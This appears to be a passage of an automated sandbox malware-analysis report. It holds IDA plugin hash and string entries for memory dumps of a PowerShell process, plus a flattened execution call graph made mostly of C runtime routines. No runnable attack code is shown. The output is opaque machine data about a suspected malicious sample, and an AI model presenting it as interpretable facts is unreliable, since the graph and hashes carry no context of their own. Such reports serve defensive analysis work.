                                                                                            • API String ID: 0-1039696944
                                                                                            • Opcode ID: f5192003a6728babdf490deb459ec3612fba8d9e58259dc20d8151a70837bca2
                                                                                            • Instruction ID: ec91176d61be6bb17f4609479a665732f94fd3cf888368e4bf73e37e234ec550
                                                                                            • Opcode Fuzzy Hash: f5192003a6728babdf490deb459ec3612fba8d9e58259dc20d8151a70837bca2
                                                                                            • Instruction Fuzzy Hash: 3091F271B002249FCB24DF68C455A6BBBE6FF88B54F25C469E9069B381DB31DD81CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: tPeq$tPeq$$eq$$eq$$eq$$eq$ll$ll
                                                                                            • API String ID: 0-3746726750
                                                                                            • Opcode ID: cbeb50792f6ca29563523cc6496129212b01c2c20cde208aef4079c3f53a8333
                                                                                            • Instruction ID: be6aa90cc41def6d1dab790f61351d08221ca7ef2e5931b67debaa472453e0a8
                                                                                            • Opcode Fuzzy Hash: cbeb50792f6ca29563523cc6496129212b01c2c20cde208aef4079c3f53a8333
                                                                                            • Instruction Fuzzy Hash: 185129F1714349DFDB25DA6B8840B6ABBA6EF82310F1C806FE546CB283DA71C941C791
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$XRjq$XRjq$XRjq$tPeq$tPeq$$eq
                                                                                            • API String ID: 0-1252145711
                                                                                            • Opcode ID: 3305cffd4bdb251172a4c61582af5dfa3206c6d1a718ca1ec4f390dbc4aaebad
                                                                                            • Instruction ID: 647a29c5806964079d6806e87b6c1644f3557957e8450a87d2c3e11b2319501a
                                                                                            • Opcode Fuzzy Hash: 3305cffd4bdb251172a4c61582af5dfa3206c6d1a718ca1ec4f390dbc4aaebad
                                                                                            • Instruction Fuzzy Hash: 3B61D5B2B001069FCB25DF698444A6ABBE3AF85310F68C06DE4159F296CB35DE45CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$84tl$TQjq$TQjq$tPeq$$eq$$eq$$eq
                                                                                            • API String ID: 0-4087309613
                                                                                            • Opcode ID: 638195291af662d270b135495e1ea6f7710fcda473aaee048a21005375c25be1
                                                                                            • Instruction ID: bd8981b7f96ec7a9699409ec0cee0302875bb11873af0eb2a63710356dfc2e98
                                                                                            • Opcode Fuzzy Hash: 638195291af662d270b135495e1ea6f7710fcda473aaee048a21005375c25be1
                                                                                            • Instruction Fuzzy Hash: 9E51D0F161020ADFCB34CE56C5847AAB7B2BF47311F19806EE9059B291D775DE80CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$84tl$d%kq$d%kq$d%kq$tPeq$$eq
                                                                                            • API String ID: 0-3848635996
                                                                                            • Opcode ID: 8b6eb843706c353e18f75774b90887f25cc6338f503f84f8c31cd746829ce196
                                                                                            • Instruction ID: c038a55bdee59afcb5856e5c5d9eb560c895d2a4d5fa772d48813514110468d6
                                                                                            • Opcode Fuzzy Hash: 8b6eb843706c353e18f75774b90887f25cc6338f503f84f8c31cd746829ce196
                                                                                            • Instruction Fuzzy Hash: 2351F7F1B10216DFDB24CF15C590B6A7BB6BF86350F1880AED8059B292C735DE80CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$(fvl$(fvl$4'eq$4'eq
                                                                                            • API String ID: 0-1064887287
                                                                                            • Opcode ID: 3c1b883f02b671e57f93976a86cfff45041fe28fd4b5b2ed2906344c14597f3d

Execution Graph

Execution Coverage: 1.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 1.3%
Total number of Nodes: 1651
Total number of Limit Nodes: 1
7711->7712 7713 22f523c1 7711->7713 7712->7713 7713->7689 7715 22f52491 7714->7715 7716 22f534ea 7715->7716 7717 22f534ef ___vcrt_initialize_winapi_thunks 7716->7717 7728 22f53936 7717->7728 7720 22f534fd 7720->7696 7722 22f53505 7723 22f53510 7722->7723 7724 22f53972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7722->7724 7723->7696 7724->7720 7752 22f57457 7725->7752 7729 22f5393f 7728->7729 7731 22f53968 7729->7731 7732 22f534f9 7729->7732 7742 22f53be0 7729->7742 7733 22f53972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7731->7733 7732->7720 7734 22f538e8 7732->7734 7733->7732 7747 22f53af1 7734->7747 7737 22f53ba2 ___vcrt_FlsSetValue 6 API calls 7738 22f5390b 7737->7738 7739 22f53918 7738->7739 7740 22f5391b ___vcrt_uninitialize_ptd 6 API calls 7738->7740 7739->7722 7741 22f538fd 7740->7741 7741->7722 7743 22f53a82 try_get_function 5 API calls 7742->7743 7744 22f53bfa 7743->7744 7745 22f53c18 InitializeCriticalSectionAndSpinCount 7744->7745 7746 22f53c03 7744->7746 7745->7746 7746->7729 7748 22f53a82 try_get_function 5 API calls 7747->7748 7749 22f53b0b 7748->7749 7750 22f53b24 TlsAlloc 7749->7750 7751 22f538f2 7749->7751 7751->7737 7751->7741 7753 22f57470 7752->7753 7754 22f52ada _ValidateLocalCookies 5 API calls 7753->7754 7755 22f524a3 7754->7755 7755->7699 7755->7700 7757 22f524c4 7756->7757 7758 22f524c8 7756->7758 7757->7704 7759 22f52639 ___scrt_fastfail 4 API calls 7758->7759 7761 22f524d5 ___scrt_release_startup_lock 7758->7761 7760 22f52559 7759->7760 7761->7704 7016 22f5c7a7 7017 22f5c7be 7016->7017 7022 22f5c80d 7016->7022 7017->7022 7025 22f5c7e6 GetModuleHandleA 7017->7025 7018 22f5c835 GetModuleHandleA 7018->7022 7019 22f5c872 7022->7018 7022->7019 7023 22f5c85f GetProcAddress 7022->7023 7023->7022 7026 22f5c7ef 7025->7026 7027 22f5c80d 7025->7027 7034 22f5c803 GetProcAddress 7026->7034 7029 22f5c835 GetModuleHandleA 7027->7029 7030 22f5c872 7027->7030 7033 22f5c85f GetProcAddress 7027->7033 7029->7027 7033->7027 7038 22f5c80d 
7034->7038 7035 22f5c835 GetModuleHandleA 7035->7038 7036 22f5c872 7037 22f5c85f GetProcAddress 7037->7038 7038->7035 7038->7036 7038->7037 7039 22f521a1 ___scrt_dllmain_exception_filter 7143 22f59d61 7144 22f59d81 7143->7144 7147 22f59db8 7144->7147 7146 22f59dab 7148 22f59dbf 7147->7148 7149 22f59e20 7148->7149 7153 22f59ddf 7148->7153 7151 22f5a90e 7149->7151 7156 22f5aa17 7149->7156 7151->7146 7153->7151 7154 22f5aa17 21 API calls 7153->7154 7155 22f5a93e 7154->7155 7155->7146 7157 22f5aa20 7156->7157 7160 22f5b19b 7157->7160 7161 22f5b1da __startOneArgErrorHandling 7160->7161 7166 22f5b25c __startOneArgErrorHandling 7161->7166 7170 22f5b59e 7161->7170 7163 22f5b286 7164 22f5b8b2 __startOneArgErrorHandling 20 API calls 7163->7164 7165 22f5b292 7163->7165 7164->7165 7168 22f52ada _ValidateLocalCookies 5 API calls 7165->7168 7166->7163 7167 22f578a3 __startOneArgErrorHandling 5 API calls 7166->7167 7167->7163 7169 22f59e6e 7168->7169 7169->7146 7171 22f5b5c1 __raise_exc RaiseException 7170->7171 7172 22f5b5bc 7171->7172 7172->7166 6118 22f5a1e0 6121 22f5a1fe 6118->6121 6120 22f5a1f6 6122 22f5a203 6121->6122 6124 22f5a298 6122->6124 6126 22f5aa53 6122->6126 6124->6120 6127 22f5aa70 RtlDecodePointer 6126->6127 6128 22f5aa80 6126->6128 6127->6128 6129 22f5ab0d 6128->6129 6132 22f5ab02 6128->6132 6134 22f5aab7 6128->6134 6129->6132 6133 22f56368 __dosmaperr 20 API calls 6129->6133 6130 22f52ada _ValidateLocalCookies 5 API calls 6131 22f5a42f 6130->6131 6131->6120 6132->6130 6133->6132 6134->6132 6135 22f56368 __dosmaperr 20 API calls 6134->6135 6135->6132 7040 22f581a0 7041 22f581d9 7040->7041 7042 22f581dd 7041->7042 7053 22f58205 7041->7053 7043 22f56368 __dosmaperr 20 API calls 7042->7043 7045 22f581e2 7043->7045 7044 22f58529 7046 22f52ada _ValidateLocalCookies 5 API calls 7044->7046 7047 22f562ac ___std_exception_copy 26 API calls 7045->7047 7048 22f58536 7046->7048 7049 22f581ed 7047->7049 7050 22f52ada _ValidateLocalCookies 5 API calls 7049->7050 7052 22f581f9 
7050->7052 7053->7044 7054 22f580c0 7053->7054 7057 22f580db 7054->7057 7055 22f52ada _ValidateLocalCookies 5 API calls 7056 22f58152 7055->7056 7056->7053 7057->7055 7173 22f57260 GetStartupInfoW 7174 22f57286 7173->7174 7176 22f57318 7173->7176 7175 22f58be3 27 API calls 7174->7175 7174->7176 7177 22f572af 7175->7177 7177->7176 7178 22f572dd GetFileType 7177->7178 7178->7177 7058 22f560ac 7059 22f560b7 7058->7059 7061 22f560dd 7058->7061 7060 22f560c7 FreeLibrary 7059->7060 7059->7061 7060->7059 7179 22f5506f 7180 22f55081 7179->7180 7181 22f55087 7179->7181 7182 22f55000 20 API calls 7180->7182 7182->7181 7183 22f5ac6b 7184 22f5ac84 __startOneArgErrorHandling 7183->7184 7185 22f5b2f0 21 API calls 7184->7185 7186 22f5acad __startOneArgErrorHandling 7184->7186 7185->7186 7762 22f5742b 7763 22f57430 7762->7763 7765 22f57453 7763->7765 7766 22f58bae 7763->7766 7767 22f58bdd 7766->7767 7768 22f58bbb 7766->7768 7767->7763 7769 22f58bd7 7768->7769 7770 22f58bc9 RtlDeleteCriticalSection 7768->7770 7771 22f5571e _free 20 API calls 7769->7771 7770->7769 7770->7770 7771->7767 6136 22f573d5 6137 22f573e1 ___DestructExceptionObject 6136->6137 6148 22f55671 RtlEnterCriticalSection 6137->6148 6139 22f573e8 6149 22f58be3 6139->6149 6141 22f573f7 6147 22f57406 6141->6147 6162 22f57269 GetStartupInfoW 6141->6162 6146 22f57417 _abort 6173 22f57422 6147->6173 6148->6139 6150 22f58bef ___DestructExceptionObject 6149->6150 6151 22f58c13 6150->6151 6152 22f58bfc 6150->6152 6176 22f55671 RtlEnterCriticalSection 6151->6176 6153 22f56368 __dosmaperr 20 API calls 6152->6153 6155 22f58c01 6153->6155 6156 22f562ac ___std_exception_copy 26 API calls 6155->6156 6158 22f58c0b _abort 6156->6158 6157 22f58c4b 6184 22f58c72 6157->6184 6158->6141 6159 22f58c1f 6159->6157 6177 22f58b34 6159->6177 6163 22f57318 6162->6163 6164 22f57286 6162->6164 6168 22f5731f 6163->6168 6164->6163 6165 22f58be3 27 API calls 6164->6165 6166 22f572af 6165->6166 6166->6163 6167 22f572dd GetFileType 6166->6167 
6167->6166 6172 22f57326 6168->6172 6169 22f57369 GetStdHandle 6169->6172 6170 22f573d1 6170->6147 6171 22f5737c GetFileType 6171->6172 6172->6169 6172->6170 6172->6171 6195 22f556b9 RtlLeaveCriticalSection 6173->6195 6175 22f57429 6175->6146 6176->6159 6178 22f5637b _abort 20 API calls 6177->6178 6179 22f58b46 6178->6179 6183 22f58b53 6179->6183 6187 22f55eb7 6179->6187 6180 22f5571e _free 20 API calls 6182 22f58ba5 6180->6182 6182->6159 6183->6180 6194 22f556b9 RtlLeaveCriticalSection 6184->6194 6186 22f58c79 6186->6158 6188 22f55c45 _abort 5 API calls 6187->6188 6189 22f55ede 6188->6189 6190 22f55efc InitializeCriticalSectionAndSpinCount 6189->6190 6193 22f55ee7 6189->6193 6190->6193 6191 22f52ada _ValidateLocalCookies 5 API calls 6192 22f55f13 6191->6192 6192->6179 6193->6191 6194->6186 6195->6175 6196 22f54ed7 6207 22f56d60 6196->6207 6201 22f54ef4 6203 22f5571e _free 20 API calls 6201->6203 6204 22f54f29 6203->6204 6205 22f54eff 6206 22f5571e _free 20 API calls 6205->6206 6206->6201 6208 22f56d69 6207->6208 6209 22f54ee9 6207->6209 6240 22f56c5f 6208->6240 6211 22f57153 GetEnvironmentStringsW 6209->6211 6212 22f5716a 6211->6212 6222 22f571bd 6211->6222 6213 22f57170 WideCharToMultiByte 6212->6213 6216 22f5718c 6213->6216 6213->6222 6214 22f571c6 FreeEnvironmentStringsW 6215 22f54eee 6214->6215 6215->6201 6223 22f54f2f 6215->6223 6217 22f556d0 21 API calls 6216->6217 6218 22f57192 6217->6218 6219 22f571af 6218->6219 6220 22f57199 WideCharToMultiByte 6218->6220 6221 22f5571e _free 20 API calls 6219->6221 6220->6219 6221->6222 6222->6214 6222->6215 6224 22f54f44 6223->6224 6225 22f5637b _abort 20 API calls 6224->6225 6236 22f54f6b 6225->6236 6226 22f54fcf 6227 22f5571e _free 20 API calls 6226->6227 6228 22f54fe9 6227->6228 6228->6205 6229 22f5637b _abort 20 API calls 6229->6236 6230 22f54fd1 6735 22f55000 6230->6735 6234 22f5571e _free 20 API calls 6234->6226 6235 22f54ff3 6237 22f562bc ___std_exception_copy 11 API calls 6235->6237 6236->6226 6236->6229 
6236->6230 6236->6235 6238 22f5571e _free 20 API calls 6236->6238 6726 22f5544d 6236->6726 6239 22f54fff 6237->6239 6238->6236 6260 22f55af6 GetLastError 6240->6260 6242 22f56c6c 6280 22f56d7e 6242->6280 6244 22f56c74 6289 22f569f3 6244->6289 6248 22f56c8b 6248->6209 6250 22f56cce 6253 22f5571e _free 20 API calls 6250->6253 6253->6248 6254 22f56cc9 6255 22f56368 __dosmaperr 20 API calls 6254->6255 6255->6250 6256 22f56d12 6256->6250 6313 22f568c9 6256->6313 6257 22f56ce6 6257->6256 6258 22f5571e _free 20 API calls 6257->6258 6258->6256 6261 22f55b0c 6260->6261 6262 22f55b12 6260->6262 6263 22f55e08 _abort 11 API calls 6261->6263 6264 22f5637b _abort 20 API calls 6262->6264 6266 22f55b61 SetLastError 6262->6266 6263->6262 6265 22f55b24 6264->6265 6267 22f55b2c 6265->6267 6268 22f55e5e _abort 11 API calls 6265->6268 6266->6242 6270 22f5571e _free 20 API calls 6267->6270 6269 22f55b41 6268->6269 6269->6267 6272 22f55b48 6269->6272 6271 22f55b32 6270->6271 6273 22f55b6d SetLastError 6271->6273 6274 22f5593c _abort 20 API calls 6272->6274 6316 22f555a8 6273->6316 6275 22f55b53 6274->6275 6277 22f5571e _free 20 API calls 6275->6277 6279 22f55b5a 6277->6279 6279->6266 6279->6273 6281 22f56d8a ___DestructExceptionObject 6280->6281 6282 22f55af6 _abort 38 API calls 6281->6282 6287 22f56d94 6282->6287 6284 22f56e18 _abort 6284->6244 6286 22f555a8 _abort 38 API calls 6286->6287 6287->6284 6287->6286 6288 22f5571e _free 20 API calls 6287->6288 6465 22f55671 RtlEnterCriticalSection 6287->6465 6466 22f56e0f 6287->6466 6288->6287 6470 22f554a7 6289->6470 6292 22f56a14 GetOEMCP 6294 22f56a3d 6292->6294 6293 22f56a26 6293->6294 6295 22f56a2b GetACP 6293->6295 6294->6248 6296 22f556d0 6294->6296 6295->6294 6297 22f5570e 6296->6297 6301 22f556de _abort 6296->6301 6298 22f56368 __dosmaperr 20 API calls 6297->6298 6300 22f5570c 6298->6300 6299 22f556f9 RtlAllocateHeap 6299->6300 6299->6301 6300->6250 6303 22f56e20 6300->6303 6301->6297 6301->6299 6302 22f5474f _abort 7 API calls 
6301->6302 6302->6301 6304 22f569f3 40 API calls 6303->6304 6305 22f56e3f 6304->6305 6308 22f56e90 IsValidCodePage 6305->6308 6310 22f56e46 6305->6310 6312 22f56eb5 ___scrt_fastfail 6305->6312 6306 22f52ada _ValidateLocalCookies 5 API calls 6307 22f56cc1 6306->6307 6307->6254 6307->6257 6309 22f56ea2 GetCPInfo 6308->6309 6308->6310 6309->6310 6309->6312 6310->6306 6617 22f56acb GetCPInfo 6312->6617 6690 22f56886 6313->6690 6315 22f568ed 6315->6250 6327 22f57613 6316->6327 6320 22f555c2 IsProcessorFeaturePresent 6322 22f555cd 6320->6322 6321 22f555b8 6321->6320 6326 22f555e0 6321->6326 6325 22f560e2 _abort 8 API calls 6322->6325 6325->6326 6357 22f54bc1 6326->6357 6360 22f57581 6327->6360 6330 22f5766e 6331 22f5767a _abort 6330->6331 6332 22f55b7a __dosmaperr 20 API calls 6331->6332 6335 22f576a7 _abort 6331->6335 6338 22f576a1 _abort 6331->6338 6332->6338 6333 22f576f3 6334 22f56368 __dosmaperr 20 API calls 6333->6334 6336 22f576f8 6334->6336 6342 22f5771f 6335->6342 6374 22f55671 RtlEnterCriticalSection 6335->6374 6339 22f562ac ___std_exception_copy 26 API calls 6336->6339 6338->6333 6338->6335 6356 22f576d6 6338->6356 6339->6356 6343 22f5777e 6342->6343 6345 22f57776 6342->6345 6353 22f577a9 6342->6353 6375 22f556b9 RtlLeaveCriticalSection 6342->6375 6343->6353 6376 22f57665 6343->6376 6348 22f54bc1 _abort 28 API calls 6345->6348 6348->6343 6350 22f55af6 _abort 38 API calls 6354 22f5780c 6350->6354 6352 22f57665 _abort 38 API calls 6352->6353 6379 22f5782e 6353->6379 6355 22f55af6 _abort 38 API calls 6354->6355 6354->6356 6355->6356 6383 22f5bdc9 6356->6383 6387 22f5499b 6357->6387 6363 22f57527 6360->6363 6362 22f555ad 6362->6321 6362->6330 6364 22f57533 ___DestructExceptionObject 6363->6364 6369 22f55671 RtlEnterCriticalSection 6364->6369 6366 22f57541 6370 22f57575 6366->6370 6368 22f57568 _abort 6368->6362 6369->6366 6373 22f556b9 RtlLeaveCriticalSection 6370->6373 6372 22f5757f 6372->6368 6373->6372 6374->6342 6375->6345 6377 22f55af6 _abort 38 API calls 
6376->6377 6378 22f5766a 6377->6378 6378->6352 6380 22f57834 6379->6380 6381 22f577fd 6379->6381 6386 22f556b9 RtlLeaveCriticalSection 6380->6386 6381->6350 6381->6354 6381->6356 6384 22f52ada _ValidateLocalCookies 5 API calls 6383->6384 6385 22f5bdd4 6384->6385 6385->6385 6386->6381 6388 22f549a7 _abort 6387->6388 6389 22f549bf 6388->6389 6409 22f54af5 GetModuleHandleW 6388->6409 6418 22f55671 RtlEnterCriticalSection 6389->6418 6393 22f54a65 6426 22f54aa5 6393->6426 6396 22f549c7 6396->6393 6398 22f54a3c 6396->6398 6419 22f5527a 6396->6419 6399 22f54a54 6398->6399 6422 22f54669 6398->6422 6405 22f54669 _abort 5 API calls 6399->6405 6400 22f54a82 6429 22f54ab4 6400->6429 6401 22f54aae 6403 22f5bdc9 _abort 5 API calls 6401->6403 6407 22f54ab3 6403->6407 6405->6393 6410 22f549b3 6409->6410 6410->6389 6411 22f54b39 GetModuleHandleExW 6410->6411 6412 22f54b63 GetProcAddress 6411->6412 6415 22f54b78 6411->6415 6412->6415 6413 22f54b95 6416 22f52ada _ValidateLocalCookies 5 API calls 6413->6416 6414 22f54b8c FreeLibrary 6414->6413 6415->6413 6415->6414 6417 22f54b9f 6416->6417 6417->6389 6418->6396 6437 22f55132 6419->6437 6423 22f54698 6422->6423 6424 22f52ada _ValidateLocalCookies 5 API calls 6423->6424 6425 22f546c1 6424->6425 6425->6399 6458 22f556b9 RtlLeaveCriticalSection 6426->6458 6428 22f54a7e 6428->6400 6428->6401 6459 22f56025 6429->6459 6432 22f54ae2 6435 22f54b39 _abort 8 API calls 6432->6435 6433 22f54ac2 GetPEB 6433->6432 6434 22f54ad2 GetCurrentProcess TerminateProcess 6433->6434 6434->6432 6436 22f54aea ExitProcess 6435->6436 6440 22f550e1 6437->6440 6439 22f55156 6439->6398 6441 22f550ed ___DestructExceptionObject 6440->6441 6448 22f55671 RtlEnterCriticalSection 6441->6448 6443 22f550fb 6449 22f5515a 6443->6449 6447 22f55119 _abort 6447->6439 6448->6443 6450 22f5517a 6449->6450 6453 22f55182 6449->6453 6451 22f52ada _ValidateLocalCookies 5 API calls 6450->6451 6452 22f55108 6451->6452 6455 22f55126 6452->6455 6453->6450 6454 22f5571e _free 20 API calls 
6453->6454 6454->6450 6456 22f556b9 _abort RtlLeaveCriticalSection 6455->6456 6457 22f55130 6456->6457 6457->6447 6458->6428 6460 22f5604a 6459->6460 6464 22f56040 6459->6464 6461 22f55c45 _abort 5 API calls 6460->6461 6461->6464 6462 22f52ada _ValidateLocalCookies 5 API calls 6463 22f54abe 6462->6463 6463->6432 6463->6433 6464->6462 6465->6287 6469 22f556b9 RtlLeaveCriticalSection 6466->6469 6468 22f56e16 6468->6287 6469->6468 6471 22f554c4 6470->6471 6477 22f554ba 6470->6477 6472 22f55af6 _abort 38 API calls 6471->6472 6471->6477 6473 22f554e5 6472->6473 6478 22f57a00 6473->6478 6477->6292 6477->6293 6479 22f57a13 6478->6479 6480 22f554fe 6478->6480 6479->6480 6486 22f57f0f 6479->6486 6482 22f57a2d 6480->6482 6483 22f57a55 6482->6483 6484 22f57a40 6482->6484 6483->6477 6484->6483 6485 22f56d7e __fassign 38 API calls 6484->6485 6485->6483 6487 22f57f1b ___DestructExceptionObject 6486->6487 6488 22f55af6 _abort 38 API calls 6487->6488 6489 22f57f24 6488->6489 6492 22f57f72 _abort 6489->6492 6498 22f55671 RtlEnterCriticalSection 6489->6498 6491 22f57f42 6499 22f57f86 6491->6499 6492->6480 6497 22f555a8 _abort 38 API calls 6497->6492 6498->6491 6500 22f57f56 6499->6500 6501 22f57f94 __fassign 6499->6501 6503 22f57f75 6500->6503 6501->6500 6506 22f57cc2 6501->6506 6616 22f556b9 RtlLeaveCriticalSection 6503->6616 6505 22f57f69 6505->6492 6505->6497 6507 22f57d42 6506->6507 6510 22f57cd8 6506->6510 6509 22f5571e _free 20 API calls 6507->6509 6532 22f57d90 6507->6532 6511 22f57d64 6509->6511 6510->6507 6512 22f57d0b 6510->6512 6516 22f5571e _free 20 API calls 6510->6516 6513 22f5571e _free 20 API calls 6511->6513 6520 22f5571e _free 20 API calls 6512->6520 6533 22f57d2d 6512->6533 6514 22f57d77 6513->6514 6519 22f5571e _free 20 API calls 6514->6519 6515 22f5571e _free 20 API calls 6521 22f57d37 6515->6521 6518 22f57d00 6516->6518 6517 22f57d9e 6522 22f57dfe 6517->6522 6531 22f5571e 20 API calls _free 6517->6531 6534 22f590ba 6518->6534 6524 22f57d85 6519->6524 6525 
22f57d22 6520->6525 6526 22f5571e _free 20 API calls 6521->6526 6527 22f5571e _free 20 API calls 6522->6527 6529 22f5571e _free 20 API calls 6524->6529 6562 22f591b8 6525->6562 6526->6507 6528 22f57e04 6527->6528 6528->6500 6529->6532 6531->6517 6574 22f57e35 6532->6574 6533->6515 6535 22f591b4 6534->6535 6536 22f590cb 6534->6536 6535->6512 6537 22f590dc 6536->6537 6538 22f5571e _free 20 API calls 6536->6538 6539 22f590ee 6537->6539 6541 22f5571e _free 20 API calls 6537->6541 6538->6537 6540 22f59100 6539->6540 6542 22f5571e _free 20 API calls 6539->6542 6543 22f59112 6540->6543 6544 22f5571e _free 20 API calls 6540->6544 6541->6539 6542->6540 6545 22f59124 6543->6545 6546 22f5571e _free 20 API calls 6543->6546 6544->6543 6547 22f59136 6545->6547 6549 22f5571e _free 20 API calls 6545->6549 6546->6545 6548 22f59148 6547->6548 6550 22f5571e _free 20 API calls 6547->6550 6551 22f5915a 6548->6551 6552 22f5571e _free 20 API calls 6548->6552 6549->6547 6550->6548 6553 22f5916c 6551->6553 6554 22f5571e _free 20 API calls 6551->6554 6552->6551 6555 22f5917e 6553->6555 6557 22f5571e _free 20 API calls 6553->6557 6554->6553 6556 22f59190 6555->6556 6558 22f5571e _free 20 API calls 6555->6558 6559 22f591a2 6556->6559 6560 22f5571e _free 20 API calls 6556->6560 6557->6555 6558->6556 6559->6535 6561 22f5571e _free 20 API calls 6559->6561 6560->6559 6561->6535 6563 22f591c5 6562->6563 6573 22f5921d 6562->6573 6564 22f591d5 6563->6564 6565 22f5571e _free 20 API calls 6563->6565 6566 22f591e7 6564->6566 6568 22f5571e _free 20 API calls 6564->6568 6565->6564 6567 22f591f9 6566->6567 6569 22f5571e _free 20 API calls 6566->6569 6570 22f5571e _free 20 API calls 6567->6570 6571 22f5920b 6567->6571 6568->6566 6569->6567 6570->6571 6572 22f5571e _free 20 API calls 6571->6572 6571->6573 6572->6573 6573->6533 6575 22f57e42 6574->6575 6579 22f57e60 6574->6579 6575->6579 6580 22f5925d 6575->6580 6578 22f5571e _free 20 API calls 6578->6579 6579->6517 6581 22f57e5a 6580->6581 6582 22f5926e 
6580->6582 6581->6578 6583 22f59221 __fassign 20 API calls 6582->6583 6584 22f59276 6583->6584 6585 22f59221 __fassign 20 API calls 6584->6585 6586 22f59281 6585->6586 6587 22f59221 __fassign 20 API calls 6586->6587 6588 22f5928c 6587->6588 6589 22f59221 __fassign 20 API calls 6588->6589 6590 22f59297 6589->6590 6591 22f59221 __fassign 20 API calls 6590->6591 6592 22f592a5 6591->6592 6593 22f5571e _free 20 API calls 6592->6593 6594 22f592b0 6593->6594 6595 22f5571e _free 20 API calls 6594->6595 6596 22f592bb 6595->6596 6597 22f5571e _free 20 API calls 6596->6597 6598 22f592c6 6597->6598 6599 22f59221 __fassign 20 API calls 6598->6599 6600 22f592d4 6599->6600 6601 22f59221 __fassign 20 API calls 6600->6601 6602 22f592e2 6601->6602 6603 22f59221 __fassign 20 API calls 6602->6603 6604 22f592f3 6603->6604 6605 22f59221 __fassign 20 API calls 6604->6605 6606 22f59301 6605->6606 6607 22f59221 __fassign 20 API calls 6606->6607 6608 22f5930f 6607->6608 6609 22f5571e _free 20 API calls 6608->6609 6610 22f5931a 6609->6610 6611 22f5571e _free 20 API calls 6610->6611 6612 22f59325 6611->6612 6613 22f5571e _free 20 API calls 6612->6613 6614 22f59330 6613->6614 6615 22f5571e _free 20 API calls 6614->6615 6615->6581 6616->6505 6618 22f56baf 6617->6618 6623 22f56b05 6617->6623 6620 22f52ada _ValidateLocalCookies 5 API calls 6618->6620 6622 22f56c5b 6620->6622 6622->6310 6627 22f586e4 6623->6627 6626 22f58a3e 43 API calls 6626->6618 6628 22f554a7 __fassign 38 API calls 6627->6628 6629 22f58704 MultiByteToWideChar 6628->6629 6631 22f58742 6629->6631 6632 22f587da 6629->6632 6634 22f556d0 21 API calls 6631->6634 6638 22f58763 ___scrt_fastfail 6631->6638 6633 22f52ada _ValidateLocalCookies 5 API calls 6632->6633 6635 22f56b66 6633->6635 6634->6638 6641 22f58a3e 6635->6641 6636 22f587d4 6646 22f58801 6636->6646 6638->6636 6639 22f587a8 MultiByteToWideChar 6638->6639 6639->6636 6640 22f587c4 GetStringTypeW 6639->6640 6640->6636 6642 22f554a7 __fassign 38 API calls 6641->6642 6643 
22f58a51 6642->6643 6650 22f58821 6643->6650 6647 22f5880d 6646->6647 6648 22f5881e 6646->6648 6647->6648 6649 22f5571e _free 20 API calls 6647->6649 6648->6632 6649->6648 6651 22f5883c 6650->6651 6652 22f58862 MultiByteToWideChar 6651->6652 6653 22f5888c 6652->6653 6654 22f58a16 6652->6654 6659 22f556d0 21 API calls 6653->6659 6661 22f588ad 6653->6661 6655 22f52ada _ValidateLocalCookies 5 API calls 6654->6655 6656 22f56b87 6655->6656 6656->6626 6657 22f588f6 MultiByteToWideChar 6658 22f58962 6657->6658 6660 22f5890f 6657->6660 6663 22f58801 __freea 20 API calls 6658->6663 6659->6661 6677 22f55f19 6660->6677 6661->6657 6661->6658 6663->6654 6665 22f58971 6667 22f556d0 21 API calls 6665->6667 6671 22f58992 6665->6671 6666 22f58939 6666->6658 6668 22f55f19 11 API calls 6666->6668 6667->6671 6668->6658 6669 22f58a07 6670 22f58801 __freea 20 API calls 6669->6670 6670->6658 6671->6669 6672 22f55f19 11 API calls 6671->6672 6673 22f589e6 6672->6673 6673->6669 6674 22f589f5 WideCharToMultiByte 6673->6674 6674->6669 6675 22f58a35 6674->6675 6676 22f58801 __freea 20 API calls 6675->6676 6676->6658 6678 22f55c45 _abort 5 API calls 6677->6678 6679 22f55f40 6678->6679 6682 22f55f49 6679->6682 6685 22f55fa1 6679->6685 6683 22f52ada _ValidateLocalCookies 5 API calls 6682->6683 6684 22f55f9b 6683->6684 6684->6658 6684->6665 6684->6666 6686 22f55c45 _abort 5 API calls 6685->6686 6687 22f55fc8 6686->6687 6688 22f52ada _ValidateLocalCookies 5 API calls 6687->6688 6689 22f55f89 LCMapStringW 6688->6689 6689->6682 6691 22f56892 ___DestructExceptionObject 6690->6691 6698 22f55671 RtlEnterCriticalSection 6691->6698 6693 22f5689c 6699 22f568f1 6693->6699 6697 22f568b5 _abort 6697->6315 6698->6693 6711 22f57011 6699->6711 